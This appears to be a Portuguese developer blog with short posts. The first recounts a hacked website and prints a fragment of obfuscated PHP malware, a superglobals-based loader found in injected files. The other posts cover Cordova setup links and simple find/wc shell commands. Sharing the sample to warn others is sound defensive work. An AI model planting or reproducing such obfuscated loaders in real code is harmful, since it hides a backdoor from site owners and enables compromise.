Link

Exploit com superglobals do php

Pessoal,

Ano passado tive muito probleminha com invasão em um site que dou manutenção. Este site anunciou em tv, outdoor e etc. E ai já sabe né? Prego que se destaca, leva martelada.

O site era versionado com git. Logo, após as invasões, eu consegui facilmente identificar os arquivos injetados. Os arquivos geralmente continham algo parecido com isso:

<?php $GLOBALS['v5fd1710b'] = "\x34\x30\xa\x33\x6f\x52\x5e\x71\x2a\x24\x66\x3e\x78\x50\x2d\x4b\x2c\x6b\x35\x5b\x5d\x7a\x58\x9\x47\x69\x41\x45\x21\x56\x68\x7d\x7b\x36\x76\x73\x6a\x7c\x6e\x6c\x64\x26\x43\x5a\x48\x3a\x25\x6d\x40\x23\x60\x70\x4e\x7e\x4a\x3c\x72\x44\xd\x4f\x62\x74\x20\x28\x46\x63\x5c\x65\x4c\x31\x54\x32\x3f\x67\x3d\x75\x49\x22\x42\x61\x51\x57\x5f\x27\x38\x2e\x59\x53\x2b\x37\x39\x4d\x29\x2f\x79\x55\x3b\x77";
$GLOBALS[$GLOBALS['v5fd1710b'][38].$GLOBALS['v5fd1710b'][79].$GLOBALS['v5fd1710b'][10].$GLOBALS['v5fd1710b'][1].$GLOBALS['v5fd1710b'][18].$GLOBALS['v5fd1710b'][84].$GLOBALS['v5fd1710b'][79]] = $GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][30].$GLOBALS['v5fd1710b'][56];
$GLOBALS[$GLOBALS['v5fd1710b'][65].$GLOBALS['v5fd1710b'][90].$GLOBALS['v5fd1710b'][89].$GLOBALS['v5fd1710b'][10]] = $GLOBALS['v5fd1710b'][4].$GLOBALS['v5fd1710b'][56].$GLOBALS['v5fd1710b'][40];

Após uma pesquisa rápida, achei um link que foi muito útil pra mim e espero que sirva pra vocês também (na verdade eu espero que vocês não passem por isso):

https://www.conetix.com.au/blog/php-superglobals-exploit

Link

Links: montando ambiente e compilando apps cordova

Pessoal,

Alguns links que me ajudaram muito na criação de ambiente android e um fórum bacana que tem uma comunidade muito legal pra tirar dúvidas (old but gold):

Fórum: http://www.androidz.com.br/forum/forum/5-android-developers/
Link 1: http://opensourceforu.com/2011/08/build-android-apps-using-html-with-phonegap/
Link 2: http://blog.algorich.com.br/2012/07/23/iniciando-no-desenvolvimento-android-com-phonegap/

Contar linhas de códigos escritas – php

Olá,

Só por curiosidade, deu vontade de saber quantas linhas de código eu escrevi em um projeto que estou prestes a entregar. Um script curtinho no terminal ‘resolveu pra mim’.

find . -name '*.php' -not -path "./tests*" -not -path "./config*" | xargs wc -l

Em meu caso, estou excluindo a pasta de testes e o arquivo de configurações.
35439 linhas até agora. Pra que irei utilizar isso? Quem sabe!? Hahahahah

Utilizem bastante.   🙂

Buscando arquivos e pastas de um determinado usuário – Linux

Olá pessoal,

Precisei utilizar um recurso simples no linux e vou compartilhar com vocês.
Basicamente, precisei filtrar todos os arquivos e diretórios em /home/ubuntu/, onde o dono desses registro era o usuário ‘soufraz’.

find /home/ubuntu -user soufraz

Em meu caso, a instalação de um programa alterou alguns arquivos indevidamente. E então, precisei procurar tudo que foi alterado para anexar ao log de bugs do fórum do programa.

Utilizem bastante.   🙂